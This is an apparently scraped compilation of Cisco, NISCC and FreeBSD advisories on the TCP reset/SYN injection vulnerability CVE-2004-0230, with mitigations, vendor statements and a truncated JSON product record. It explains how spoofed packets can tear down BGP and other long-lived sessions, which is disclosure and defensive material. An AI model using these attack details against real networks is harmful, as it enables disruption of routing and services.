    Customers who purchase direct from Cisco but who do not hold a Cisco service contract and customers who purchase through third-party vendors but are unsuccessful at obtaining fixed software through their point of sale should get their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

    • +1 800 553 2447 (toll free from within North America)

    • +1 408 526 7209 (toll call from anywhere in the world)

    • e-mail: tac@cisco.com

    See http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including special localized telephone numbers and instructions and e-mail addresses for use in various languages.

    Please have your product serial number available and give the URL of this notice as evidence of your entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

    Please do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software upgrades.

    Workarounds

    The effectiveness of any workaround is dependent on specific customer situations such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround is the most appropriate for use in the intended network before it is deployed.

    There are no workarounds available to mitigate the effects of this vulnerability on Cisco IOS Firewall.

    For BGP, we will present the workaround and only a few mitigation techniques. For additional information regarding BGP security risk assessment, mitigation techniques, and deployment best practices, please consult ftp://ftp-eng.cisco.com/cons/isp/security/ BGP-Risk-Assesment-v.pdf.

    • BGP MD5 secret

      The workaround for BGP is to configure MD5 secret for each session between peers. This can be configured as shown in the following example: router(config)#router bgp router(config-router)#neighbor password

      It is necessary to configure the same shared MD5 secret on both peers and at the same time. Failure to do so will break the existing BGP session and the new session will not get established until the exact same secret is configured on both devices. For a detailed discussion on how to configure BGP, refer to the following document http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/ products_configuration_guide_chapter09186a00800ca571.html . Once the secret is configured, it is prudent to change it periodically. The exact period must fit within your company security policy but it should not be longer than a few months. When changing the secret, again it must be done at the same time on both devices. Failure to do so will break your existing BGP session. The exception is if your Cisco IOS software release contains the integrated CSCdx23494 ( registered customers only) fix. With this fix, the BGP session will not be terminated when the MD5 secret is changed only on one side. The BGP updates, however, will not be processed until either the same secret is configured on both devices or the secret is removed from both devices.

    It is possible to mitigate the exposure for BGP on this vulnerability by applying one or more of the following measures which will lessen the potential for the necessary spoofing required to implement a successful attack:

    • Blocking access to the core infrastructure

      Although it is often difficult to block traffic transiting your network, it is possible to identify traffic which should never be allowed to target your infrastructure devices and block that traffic at the border of your network. Infrastructure access control lists (ACLs) are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The white paper entitled "Protecting Your Core: Infrastructure Protection Access Control Lists", available at http://www.cisco.com/warp/public/707/ iacl.html, presents guidelines and recommended deployment techniques for infrastructure protection ACLs. Exceptions would include any devices which have a legitimate reason to access your infrastructure (for example, BGP peers, NTP sources, DNS serves, and so on). All other traffic must be able to traverse your network without terminating on any of your devices.

    • Configure anti-spoofing measures on the network edge In order for an adversary to use the attack vector described in this advisory, it must send packets with the source IP address equal to one of the BGP peers. You can block spoofed packets either using the Unicast Reverse Path Forwarding (uRPF) feature or by using access control lists (ACLs). By enabling uRPF, all spoofed packets will be dropped at the first device. To enable uRPF, use the following commands: router(config)#ip cef

      router(config)#ip verify unicast reverse-path
      

      Please consult http://www.cisco.com/en/US/products/sw/iosswrel/ps1835 /products_configuration_guide_chapter09186a00800ca7d4.html and ftp:// ftp-eng.cisco.com/cons/isp/security/URPF-ISP.pdf for further details on how uRPF works and how to configure it in various scenarios. This is especially important if you are using asymmetric routing. ACLs should also be deployed as close to the edge as possible. Unlike uRPF, you must specify the exact IP range that is permitted. Specifying which addresses should be blocked is not the optimal solution because it tends to be harder to maintain.

      Caution: In order for anti-spoofing measures to be effective, they must be deployed at least one hop away from the devices which are being protected. Ideally, they will be deployed at the network edge facing your customers.

    • Packet rate limiting RST packets are rate-limited in Cisco IOS software by default. This feature is introduced in Cisco IOS Software Release 10.2. In the case of a storm of RST packets, they are effectively limited to one packet per second. In order to be successful, an attacker must terminate connection with the first few packets. Otherwise, the attack is deemed to be impracticably long. On the other hand, SYN packets are not rate-limited in any way. Rate limiting can be accomplished either by using Committed Access Rate (CAR) or by Control Plane Policing (CPP). While CPP is the recommended approach, it is available only for Cisco IOS Software Releases 12.2(18)S and 12.3(4)T. It is currently supported only on the following routers: 1751, 2600/2600-XM, 3700, 7200, and 7500 Series.

      CAR can be configured as follows:

      router(config)#access-list 103 deny tcp any host 10.1.1.1 established
      
      router(config)#access-list 103 permit tcp any host 10.0.0.1
      
      router(config)#interface <interface> <interface #>
      
      router(config-if)#rate-limit input access-group 103 8000 8000 8000 
          conform-action transmit exceed-action drop
      

      For details on how to configure and deploy CPP, please consult the following document http://www.cisco.com/en/US/products/sw/iosswrel/ ps1838/products_white_paper09186a0080211f39.shtml

    Exploitation and Public Announcements

    The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

    The exploitation of the vulnerability with packets having RST flag set (reset packets) was discovered by Paul (Tony) Watson of OSVDB.org. The extension of the attack vector to packets with SYN flag was discovered by the vendors cooperating on the resolution of this issue.

    Status of This Notice: INTERIM

    This is a INTERIM advisory. Although Cisco cannot guarantee the accuracy of all statements in this advisory, all of the facts have been checked to the best of our ability. Cisco does not anticipate issuing updated versions of this advisory unless there is some material change in the facts. Should there be a significant change in the facts, Cisco may update this advisory.

    A stand-alone copy or Paraphrase of the text of this Security Advisory that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

    Distribution

    This advisory will be posted on Cisco's worldwide website at http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml.

    In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

    • cust-security-announce@cisco.com

    • first-teams@first.org (includes CERT/CC)

    • bugtraq@securityfocus.com

    • vulnwatch@wulnwatch.org

    • cisco@spot.colorado.edu

    • cisco-nsp@puck.nether.net

    • full-disclosure@lists.netsys.com

    • comp.dcom.sys.cisco@newsgate.cisco.com

    Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

    Revision History

    +----------+-------------+----------------+ | Revision | 2004-Apr-20 | Initial public | | 1.0 | | release. | +----------+-------------+----------------+

    Cisco Security Procedures

    Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/warp/public/707/ sec_incident_response.shtml. This includes instructions for press inquiries regarding Cisco Security Notices. All Cisco Security Advisories are available at http://www.cisco.com/go/psirt.


    All contents are Copyright \xa9 1992-2004 Cisco Systems, Inc. All rights reserved. Important Notices and Privacy Statement. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (Cygwin)

    iD8DBQFAhZTpezGozzK2tZARAkKXAJ9BWwuytT7zwoOL+RkZJPebYN3W3ACfV/+K 0Fd3MvvRlKSETCrlMGL/dZg= =eDSn -----END PGP SIGNATURE----- .

    The nonexhaustive list of vulnerable non-IOS based Cisco products is as follows:

    • Access Registrar

    • BPX, IGX, MGX WAN switches, and the Service Expansion Shelf

    • BR340, WGB340, AP340, AP350, BR350 Cisco/Aironet wireless products

    • Cache Engine 505 and 570

    • CallManager

    • Catalyst 1200, 1900, 28xx, 29xx, 3000, 3900, 4000, 5000, 6000

    • Cisco 8110 Broadband Network Termination Unit

    • Cisco Element Management Framework

    • Cisco Info Center

    • Cisco Intelligent Contact Management

    • Cisco MDS 9000

    • Cisco ONS 15190/15194 IP Transport Concentrator

    • Cisco ONS 15327 Metro Edge Optical Transport Platform

    • Cisco ONS 15454 Optical Transport Platform

    • Cisco ONS 15531/15532 T31 OMDS Metro WDM System

    • Cisco ONS 15800/15801/15808 Dense Wave Division Multiplexing Platform

    • Cisco ONS 15830 T30 Optical Amplification System

    • Cisco ONS 15831/15832 T31 DWDM System

    • Cisco ONS 15863 T31 Submarine WDM System

    • Content Router 4430 and Content Delivery Manager 4630 and 4650

    • Cisco Secure Intrusion Detection System (NetRanger) appliance and IDS Module

    • Cisco Secure PIX firewall

    • Cisco ws-x6608 and ws-x6624 IP Telephony Modules

    • CiscoWorks Windows

    • Content Engine 507, 560, 590, and 7320

    • CSS11000 (Arrowpoint) Content Services Switch

    • Hosting Solution Engine

    • User Registration Tool VLAN Policy Server

    • Cisco FastHub 300 and 400

    • CR-4430-B

    • Device Fault Manager

    • Internet CDN Content Engine 590 and 7320, Content Distribution Manager 4670, and Content Router 4450

    • IP Phone (all models including ATA and VG248)

    • IP/TV

    • LightStream 1010

    • LightStream 100 ATM Switches

    • LocalDirector

    • ME1100 series

    • MicroHub 1500,MicroSwitch 1538/1548

    • Voice Manager

    • RTM

    • SN5400 series storage routers

    • Switch Probe

    • Unity Server

    • VG248 Analog Phone Gateway

    • Traffic Director

    • WAN Manager

    Products Confirmed Not Vulnerable

    The following products are not vulnerable:

    • Cisco VPN 3000 Series Concentrators

    • Cisco Firewall Services Module for Cisco Catalyst 6500 Series and Cisco 7600 Series (FWSM)

    Details

    TCP is the transport layer protocol designed to provide connection-oriented reliable delivery of a data stream. The Cisco PSIRT has analyzed multiple TCP-based protocols, as they are used within our offering, and we believe that this vulnerability does not have a significant impact on them. We will present our analysis for a few protocols which have the potential for higher impact due to the long lived connections.

    Voice signaling H.225, H.245 (part of H.323 suite)


    H.225 and H.245 protocols are used in voice signaling. Their purpose is to negotiate parameters for content transfer (voice or video). The established sessions persist for the duration of a call. Any call in progress is terminated when the signaling session is broken. A new signaling session will be established immediately for the new call, but terminated calls cannot be re-established.

    Each call from an IP telephone or softphone will result in the creation of a single signaling session. It is possible that a single signaling session is responsible for multiple calls, but that setup is used deeper within the Service Provider's network. Determining all necessary parameters for mounting an attack is deemed a non-trivial task if the network is designed according to the current best practices.

    Network Storage (iSCSI, FCIP)


    Network Storage products use two TCP-based protocols: SCSI over IP (iSCSI) and Fiber Channel over IP (FCIP).

    • SCSI over IP (iSCSI)

      iSCSI is used in a client/server environment. The client is your computer and it is only the client that initiates a connection. This connection is not shared with any other users. Terminating the session will not have any adverse consequences if people are using current drivers from Microsoft for Windows and from Cisco for Linux. These drivers will re-establish the session and continue transfer from the point where it was disconnected. Drivers from other vendors may behave differently.

      The user may notice that access to a virtual device is slightly slower than usual.

    • Fiber Channel over IP (FCIP)

      FCIP is a peer-to-peer protocol. It is used for mirroring data between switches. Each peer can initiate the session. Switches can, and should be in practice, configured in a mesh. Bringing one link down will cause traffic to be re-routed over other link(s). If an adversary can manage to terminate the session multiple times in a row, the user's application may terminate with a "Device unreachable" or similar error message. This does not have any influence on the switch itself and the user can retry the operation.

      The user may notice that access to a virtual device is slightly slower than usual. An occasional error message is possible. SSL/TLS connections can be used to encapsulate various kinds of traffic and these sessions can be long lived. An encrypted session can be attacked either on the originating or terminating host or on the firewalls in front of them (if they exist). | | | | Customers | | | | are | | | | encouraged | | | | to migrate | | | | to IOS.

    NISCC Vulnerability Advisory 236929

    National Infrastructure Security Co-Ordination Centre
    NISCC Vulnerability Advisory 236929

    Vulnerability Issues in TCP


    Version Information

    Advisory Reference 236929
    Release Date 20 April 2004
    Last Revision 22 April 2004
    Version Number 1.4
     

    What is Affected?

    The vulnerability described in this advisory affects implementations of the Transmission Control Protocol (TCP) that comply with the Internet Engineering Task Force\x92s (IETF\x92s) Requests For Comments (RFCs) for TCP, including RFC 793, the original specification, and RFC 1323, TCP Extensions for High Performance.

    TCP is a core network protocol used in the majority of networked computer systems today. Many vendors include support for this protocol in their products and may be impacted to varying degrees.


    Severity

    The impact of this vulnerability varies by vendor and application, but in some deployment scenarios it is rated critical. Alternatively contact your vendor for product specific information.

    If exploited, the vulnerability could allow an attacker to create a Denial of Service condition against existing TCP connections, resulting in premature session termination. The resulting session termination will affect the application layer, the nature and severity of the effects being dependent on the application layer protocol. The primary dependency is on the duration of the TCP connection, with a further dependency on knowledge of the network (IP) addresses of the end points of the TCP connection.

    The Border Gateway Protocol (BGP) is judged to be potentially most affected by this vulnerability.

    BGP relies on a persistent TCP session between BGP peers. Resetting the connection can result in medium term unavailability due to the need to rebuild routing tables and route flapping.  Route flapping may result in route dampening (suppression) if the route flaps occur frequently within a short time interval.  The overall impact on BGP is likely to be moderate based on the likelihood of successful attack. If the TCP MD5 Signature Option and anti-spoofing measures are used then the impact will be low as these measures will successfully mitigate the vulnerability.

    There is a potential impact on other application protocols such as DNS (Domain Name System) and SSL (Secure Sockets Layer) in the case of zone transfers and ecommerce transactions respectively, but the duration of the sessions is relatively short and the sessions can be restarted without medium term unavailability problems. In the case of SSL it may be difficult to guess the source IP address.

    Data injection may be possible. However, this has not been demonstrated and appears to be problematic. The reason for this is that the receiving TCP implementation checks the sequence number of the RST or SYN packet, which is a 32 bit number, giving a probability of 1/232 of guessing the sequence number correctly (assuming a random distribution).

    The discoverer of the practicability of the RST attack was Paul A. Watson, who describes his research in his paper \x93Slipping In The Window: TCP Reset Attacks\x94, presented at the CanSecWest 2004 conference. In a RST/ACK packet an acknowledgement number is included in the packet, although it is not checked by the receiving TCP implementation.)

    RFC 793, p36, states the following:

    "In all states except SYN-SENT, all reset (RST) segments are validated by checking their SEQ-fields [sequence numbers]. In the SYN-SENT state (a RST received in response to an initial SYN), the RST is acceptable if the ACK field acknowledges the SYN."

    Resets must be processed immediately. RFC 793, p25, says "[\x85] [E]ven when the receive window is zero, a TCP must process the RST and URG fields of all incoming segments."

    It is also possible to perform the same attack with SYN (synchronise) packets. RFC 793, p31 states:

    \x93The principle reason for the three-way handshake is to prevent old duplicate connection initiations from causing confusion. To deal with this, a special control message, reset, has been devised. [\x85] If the TCP is in one of the synchronized states (ESTABLISHED, FIN-WAIT-1, FIN-WAIT-2, CLOSE-WAIT, CLOSING, LAST-ACK, TIME-WAIT), it aborts the connection and informs its user.\x94

    TCP window sizes are negotiated in the initial 3-way handshake used to set up a TCP connection, with higher values serving to improve throughput in some circumstances. Vendor-chosen defaults also influence the selection. An attacker seeking to disrupt an existing TCP connection must supply the 4-tuple correctly. As the source port varies, additional work is generally called for on the part of the attacker. However, research (referenced below) has shown that the process of source port selection on many platforms includes predictable elements, so that the attack remains practicable. By weighting 'likely' source port values carefully, an attacker can disrupt TCP implementations that employ a range of window sizes.

    Application layer protocols that are critically affected are those that:

    \x95 Depend on long lived TCP connections
    \x95 Have known or easy-to-guess IP address end points
    \x95 Have easy to an easy-to-guess source TCP port

    As noted above BGP does use long lived TCP connections, and the IP addresses and source port (and destination port) are sometimes available through the use of BGP looking glasses (multi-source, multi-destination trace route tools) or DNS resource records. Using \x93trace route\x94 commands can provide information on peering point IP addresses. Thus BGP is likely to be critically affected by the TCP vulnerability.

    These denial of service attacks can be carried out by single machine, or by multiple co-operating systems (to form a distributed denial of service attack).

    It is also possible to inject packets, which will be processed if they are in the window. The difficulty with data injection attacks is that the receiving TCP implementation will reassemble the packets received according to sequence number, dropping any duplicate packets.


    Vendor specific information will be released as it becomes available and if vendor permission has been received. Subscribers are advised to check the following URL regularly for updates:

    http://www.uniras.gov.uk/vuls/2004/236929/index.htm

    [Please note that updates to this advisory will not be notified by email.]

    This vulnerability has been assigned the CVE name CAN-2004-0230.

    The Open Source Vulnerability Database ID number for this vulnerability is 4030.


    Mitigation

    The following mitigation steps are still being evaluated and may be incomplete. Customers should work with vendors for the workaround most appropriate for the product in question.

    In the absence of vendor patching of the TCP implementation, the following are general mitigating steps:

    \x95 Implement IP Security (IPSEC) which will encrypt traffic at the network layer, so TCP information will not be visible
    \x95 Reduce the TCP window size (although this could increase traffic loss and subsequent retransmission)
    \x95 Do not publish TCP source port information

    It should be noted that IPSEC provides confidentiality and authentication services at the network layer, and can provide a measure of trust in the authenticity of the end points as well as encryption of traffic between the end points.  However, in the context of the current attack IPSEC will reject RST and SYN packets that are not part of a secure IP packet stream.

    To change the TCP window size, in some Unix variants you can set a value of the default TCP windows size by using the \x93sysctl\x94 program (\x93ndd -set\x94 in the case of Sun Solaris). In the case of Microsoft Windows NT/2000/XP/2003, the default window size can be changed by modifying the value of the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters key. As noted above, great care should be exercised when altering the default TCP window size as network performance could be adversely affected.

    In the case of BGP, the following may counter the problem:

    \x95 Implement ingress and egress filtering to check that the traffic entering or leaving the network has a source IP address that is expected on the router/firewall interface that receives the traffic
    \x95 Implement the TCP MD5 Signature Option to checksum the TCP packet carrying the BGP application data (see RFC 2385), being careful to set and maintain strong (i.e. difficult to guess) passwords to which the MD5 checksum is applied.  Also see RFC 3562 which discusses the security requirements of this keying material.
    \x95 Limit the amount of information available through looking glasses and DNS resource records, being careful not to expose TCP port information unnecessarily

    The IETF ingress filtering standard is defined in RFC 2827. A discussion of egress filtering can be found at http://www.sans.org/y2k/egress.htm.

    The use of the TCP MD5 Signature Option will prevent the exploitation of this vulnerability. Router customers should implement this on all BGP peering points if it is supported by the router, upgrading the router firmware if necessary.


    Solution

    Please refer to the Vendor Information section of this advisory for implementation specific remediation.

    Some vendors will have reduced the likelihood of successful denial of service by amending the TCP implementation to issue a further acknowledgment packet challenge for RST and SYN packets that do not have exactly the expected sequence number.

    The Internet Engineering Task Force (IETF) has published an Internet Draft to co-incide with the release of this advisory.  The text of this draft is available from the IETF web site:
    http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt

    NISCC has produced best practice guidelines for BGP available at
    http://www.niscc.gov.uk/BGP Filtering Guide.pdf

    Secure configuration templates for BGP implementations on Cisco IOS and Juniper JUNOS can be found at:

    \x95 Cisco http://www.cymru.com/Documents/secure-bgp-template.html
    \x95 Juniper http://www.qorbit.net/documents/junos-bgp-template.pdf

    Guidance on tuning of the IP stack for a number of different UNIX operating systems is available at http://www.cymru.com/Documents/ip-stack-tuning.html


    Vendor Information

    The following vendors have provided information about how their products are affected by these vulnerabilities.

    Please note that JPCERT/CC have released a Japanese language advisory for this vulnerability which contains additional information regarding Japanese vendors. This advisory is available at http://www.jpcert.or.jp/at/2004/at040003.txt.

    Certicom Internet Initiative Japan, Inc NEC
    Check Point InterNiche Nortel
    Cisco Juniper Networks Polycom
    Cray Inc Lucent Technologies Secure Computing Corporation
    Hitachi Mitel Networks Yamaha
    Innovaphone MRLG  


    Certicom
      Certicom has examined the National Infrastructure Security Coordination Centre (NISCC) advisory and determined it is not vulnerable.

    Certicom Developer Toolkits for SSL (SSL Plus, SSL Plus for Java, Security Builder SSL-C and Security Builder SSL-J) do not provide a TCP/IP transport mechanism, but rather utilize the supported operating system's TCP/IP stack. The vulnerability is against the TCP/IP stack itself, and not directly against the functionality offered by Certicom toolkits. Therefore, there is no patch or workaround that can be implemented within Certicom products. The patch or workaround must be provided by the operating system vendor.

    Customers are urged to contact their operating system vendors to determine if they have provided a workaround to this advisory. If you have any further questions please do not hesitate to contact support@certicom.com.
    Check Point
      The latest release for VPN-1/FireWall-1 (R55 HFA-03) contains a protection against this vulnerability.  The protection applies to both the firewall device and to hosts behind the firewall.

    Please refer to the Check Point web site for further information at:
    http://www.checkpoint.com/techsupport/alerts/tcp_dos.html.
    Cisco
      Cisco Systems is addressing the vulnerabilities identified by NISCC Vulnerability Advisory 236929 across its entire product line.  Cisco has released two related advisories:

    TCP Vulnerabilities in Multiple IOS-Based Cisco Products
    http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml

    TCP Vulnerabilities in Multiple Non-IOS Cisco Products
    http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml
    Cray Inc
      Cray Inc. is vulnerable on their UNICOS, UNICOS/mk and UNICOS/mp systems.  Spr's have been opened to track this issue.  Please contact your local Cray Service Representative for more information.
    Hitachi
      Hitachi is investigating the potential impact to Hitachi's products.
    Innovaphone
      Not vulnerable.
    Internet Initiative Japan, Inc (IIJ)
      IIJ will release a new firmware to fix this vulnerability.  Details are available on their web site at http://www.seil.jp/en/ann/announce_en_20040421_01.txt.
    InterNiche
      === NicheStack v2.0 TCP/IP ===

    InterNiche Technologies has updated its NicheStack v2.0 TCP/IP product to handle the scenarios described in NISCC Vulnerability Notice #236929.  The patch is available to all InterNiche customers in accordance with the terms of their current support agreements.

    More information can be found on www.iNiche.com or through support@iNiche.com


    === NicheLite v2.0 TCP/IP ===

    InterNiche Technologies has updated its NicheLite v2.0 TCP/IP product to handle the scenarios described in NISCC Vulnerability Notice #236929.  The patch is available to all InterNiche customers in accordance with the terms of their current support agreements.

    More information can be found on www.iNiche.com or through support@iNiche.com
    Juniper Networks
      Juniper Networks products are susceptible to this vulnerability. Customers should contact Juniper Networks Technical Assistance Center for availability and download instructions.

    Additional information is posted on our web site at https://www.juniper.net/support.
    Lucent Technologies
      Lucent Technologies is aware of this vulnerability advisory and is investigating any potential impact to its product portfolio. As further information becomes available, Lucent will provide information directly to its customers, if appropriate.
    Mitel Networks
      Mitel is aware of the vulnerability and is working with the vendors of our underlying networking software to assess the impact and, if necessary, determine potential solutions. When more information becomes available, an advisory will be issued. Please contact 'security@mitel.com' if you have specific questions.
    MRLG
      A new version of the Multi-Router Looking Glass tool (4.3.0) has been released.  This includes a patch that prevents a remote user from utilising the "sh ip bgp neighbors" functionality.  This new version is available from ftp://ftp.enterzone.net/looking-glass/CURRENT/.
    NEC
      NEC is aware of this vulnerability and is trying to determine potential impacts on our products.
    Nortel Networks
      Nortel Networks has evaluated this issue and testing has confirmed that it is possible to successfully exploit this vulnerability. However, the preconditions for a successful exploitation require levels of access to the network that are unlikely to be achieved in a normal network operating environment; furthermore, such levels of access would enable other forms of attack with much greater impact than that achievable by exploiting this vulnerability.

    Nortel Networks is continuing to validate that this vulnerability has no serious consequences for Nortel equipment, and will update this statement periodically.
    Polycom
      Polycom has investigated the potential impact to our products for NISCC Advisory 236929.

    Specific product information will be provided at http://www.polycom.com/securitycenter.
    Secure Computing Corporation
      The Sidewinder and Sidewinder G2 firewalls offer protection against this attack at all releases. As application-layer firewalls, Sidewinder and Sidewinder G2 offer protection to systems behind the firewall as well as protecting management connections to the firewall.
    Yamaha
      Pending.


    Acknowledgements

    NISCC wishes to thank the following:

    \x95 Steve Bellovin, Rob Thomas and Paul Watson for their contributions to this advisory.
    \x95 Cisco Systems Inc. and Juniper Networks Inc. for their help with the content of this advisory and for their support during the disclosure process.
    \x95 JPCERT/CC for their assistance in co-ordinating this disclosure in Japan.


    References
      Internet Engineering Task Force
        RFC 793 Transmission Control Protocol
          http://www.ietf.org/rfc/rfc793.txt
        RFC 1323 TCP Extensions for High Performance
          http://www.ietf.org/rfc/rfc1323.txt
        RFC 1771 A Border Gateway Protocol 4 (BGP-4)
          http://www.ietf.org/rfc/rfc1771.txt
        RFC 2385 Protection of BGP Sessions via the TCP MD5 Signature Option
          http://www.ietf.org/rfc/rfc2385.txt
        RFC 2827 Network Ingress Filtering
          http://www.ietf.org/rfc/rfc2827.txt
        RFC 3562 Considerations for the TCP MD5 Signature Option
          http://www.ietf.org/rfc/rfc3562.txt
        RFC 3682 Generalized TTL Security Mechanism
          http://www.ietf.org/rfc/rfc3682.txt
        Internet Draft - Transmission Control Protocol security considerations
          http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt
      NISCC
        Best Practice Guidelines - Border Gateway Protocol
          http://www.niscc.gov.uk/BGP Filtering Guide.pdf
      Configuration and Tuning Guides
        Secure BGP Template for Cisco IOS
          http://www.cymru.com/Documents/secure-bgp-template.html
        JUNOS Secure BGP Template
          http://www.qorbit.net/documents/junos-bgp-template.pdf
        UNIX IP Stack Tuning Guide
          http://www.cymru.com/Documents/ip-stack-tuning.html
      Other Documents
        SANS discussion on egress filtering
          http://www.sans.org/y2k/egress.htm
      Vulnerability Databases
        Common Vulnerabilities and Exposures (CVE)
          http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230
        Open Source Vulnerability Database (OSVDB)
          http://www.osvdb.org/displayvuln.php?osvdb_id=4030



    Contact Information

    The NISCC Vulnerability Management Team can be contacted as follows:

    Email vulteam@niscc.gov.uk
    (Please quote the advisory reference in the subject line.)
    Telephone +44 (0)20 7821 1330 Extension 4511
    (Monday to Friday 08:30 - 17:00)
    Fax +44 (0)20 7821 1686
    Post Vulnerability Management Team
    NISCC
    PO Box 832
    London
    SW1P 1BG

    We encourage those who wish to communicate via email to make use of our PGP key. This is available from http://www.uniras.gov.uk/UNIRAS.asc.

    Please note that UK government protectively marked material should not be sent to the email address above.

    If you wish to be added to our email distribution list, please email your request to uniras@niscc.gov.uk.


    What is NISCC?

    For further information regarding the UK National Infrastructure Security Co-Ordination Centre, please visit the NISCC web site at:
    http://www.niscc.gov.uk/aboutniscc/index.htm

    Reference to any specific commercial product, process or service by trade name, trademark manufacturer or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by NISCC. The views and opinions of authors expressed within this notice shall not be used for advertising or product endorsement purposes.

    Neither shall NISCC accept responsibility for any errors or omissions contained within this advisory. In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this notice.

    \xa9 2004 Crown Copyright

    Revision History

    April 20, 2004: Initial release (1.0)
    April 21, 2004: Corrected hyperlinks (1.1)
      Inserted impact statement for Cisco (1.1)
      Inserted impact statement for Mitel (1.1)
      Inserted MRLG patch reference (1.2)
    April 22, 2004: Revised impact statement for Certicom (1.3)
      Inserted impact statement for Nortel Networks (1.3)
      Inserted impact statement for Secure Computing Corporation (1.3)
      Inserted references section (1.4)
      Inserted impact statement for Lucent Technologies (1.4)

    <End of NISCC Vulnerability Advisory>

    . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

    ============================================================================= FreeBSD-SA-14:19.tcp Security Advisory The FreeBSD Project

    Topic: Denial of Service in TCP packet processing

    Category: core Module: inet Announced: 2014-09-16 Credits: Jonathan Looney (Juniper SIRT) Affects: All supported versions of FreeBSD. Corrected: 2014-09-16 09:48:35UTC (stable/10, 10.1-PRERELEASE) 2014-09-16 09:48:35 UTC (stable/10, 10.1-BETA1-p1) 2014-09-16 09:50:19 UTC (releng/10.0, 10.0-RELEASE-p9) 2014-09-16 09:49:11 UTC (stable/9, 9.3-STABLE) 2014-09-16 09:50:19 UTC (releng/9.3, 9.3-RELEASE-p2) 2014-09-16 09:50:19 UTC (releng/9.2, 9.2-RELEASE-p12) 2014-09-16 09:50:19 UTC (releng/9.1, 9.1-RELEASE-p19) 2014-09-16 09:49:11 UTC (stable/8, 8.4-STABLE) 2014-09-16 09:50:19 UTC (releng/8.4, 8.4-RELEASE-p16) CVE Name: CVE-2004-0230

    For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . New TCP connections are initiated using special SYN flag in a datagram. Sequencing of data is controlled by 32-bit sequence numbers, that start with a random value and are increased using modulo 232 arithmetic. In case one of the two port numbers is unknown, a successful attack requires less than 217 packets spoofed, which can be generated within less than a second on a decent connection to the Internet. Workaround

    It is possible to defend against these attacks with stateful traffic inspection using a firewall. This can be done by enabling pf(4) on the system and creating states for every connection. Even a default ruleset to allow all traffic would be sufficient to mitigate this issue.

    V. Solution

    Perform one of the following:

    1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

    2) To update your vulnerable system via a source code patch:

    The following patches have been verified to apply to the applicable FreeBSD release branches.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch

    fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch.asc

    gpg --verify tcp.patch.asc

    b) Apply the patch. Execute the following commands as root:

    cd /usr/src

    patch < /path/to/patch

    c) Recompile your kernel as described in and reboot the system.

    3) To update your vulnerable system via a binary patch:

    Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

    freebsd-update fetch

    freebsd-update install

    VI. Correction details

    The following list contains the correction revision numbers for each affected branch.

    Branch/path Revision


    stable/8/ r271668 releng/8.4/ r271669 stable/9/ r271668 releng/9.1/ r271669 releng/9.2/ r271669 releng/9.3/ r271669 stable/10/ r271667 releng/10.0/ r271669


    To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:

    svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

    Or visit the following URL, replacing NNNNNN with the revision number:

    VII

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "catalyst csx",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "cisco",
            "version": "60005.3"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "oracle",
            "version": "11"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "oracle",
            "version": "10"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "netbsd",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "netbsd",
            "version": "1.6.2"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "netbsd",
            "version": "1.6.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "netbsd",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "netbsd",
            "version": "1.5.3"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "netbsd",
            "version": "1.5.2"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 2.1,
            "vendor": "netbsd",
            "version": "1.5.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
